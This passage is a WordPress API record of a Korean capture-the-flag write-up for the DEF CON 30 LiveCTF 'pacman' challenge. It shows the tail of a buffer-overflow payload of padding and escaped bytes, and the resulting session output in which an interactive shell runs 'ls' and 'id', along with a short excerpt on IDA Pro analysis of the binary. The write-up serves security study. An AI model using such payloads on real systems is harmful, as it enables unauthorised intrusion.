AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x10\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x10@\\x00\\x00\\x00&lt;\\x000000002sh0'\n[*] Switching to interactive mode\nParsing object of type 1\nParsing object of type 0\nEvaluating object of type 1...\n$ ls\nAAAAAAAA   challenge.bak\t  lib\t     pacman.i64  pacman.id2  solve.py\nanswer.py  challenge_debug\t  libc.so.6  pacman.id0  pacman.nam\nchallenge  ld-linux-aarch64.so.1  pacman     pacman.id1  pacman.til\n$ id\nuid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)\n$  <\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\ucd9c\ucc98 https:\/\/github.com\/Live-CTF\/LiveCTF-DEFCON30\/releases\/tag\/defcon30 checksec \uc900\ube44 4. IDA Pro\uc5d0\uc11c \ubd84\uc11d\uc2dc \u201cPACDZA X0\u201d \uc640 \uac19\uc774 PAC\uac00 \uc874\uc7ac\ud558\ubbc0\ub85c,Hex-Rays Decompiler Options \u2192 Analysis Options 2\uc5d0\uc11c \u201cShow ARMv8.3 PAC instructions\u201d \uccb4\ud06c \ud65c\uc131\ud654. Decompiled-src \/ Analysis main 0, 1, 2 \uc774\uc678\uc758 \ub2e4\ub978 \uba54\ub274 \uc785\ub825\uc2dc &#8220;Invalid choice&#8221; \ubb38\uad6c \ub744\uc6b0\uba74\uc11c \ub2e4\uc2dc \uba54\ub274 \uc785\ub825\ubc1b\uc74c. 
0 \u2192 exit(0) 1 \u2192 build_package() 2 \u2192 install_package() build_package \uba3c\uc800&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3400\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[LiveCTF-DEFCON30] pacman<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25],"class_list":["post-3400","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3400","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3400"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3400\/revisions"}],"predecessor-version":[{"id":3401,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3400\/revisions\/3401"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3400"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3400"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3400"}],"curies":[{"na
me":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}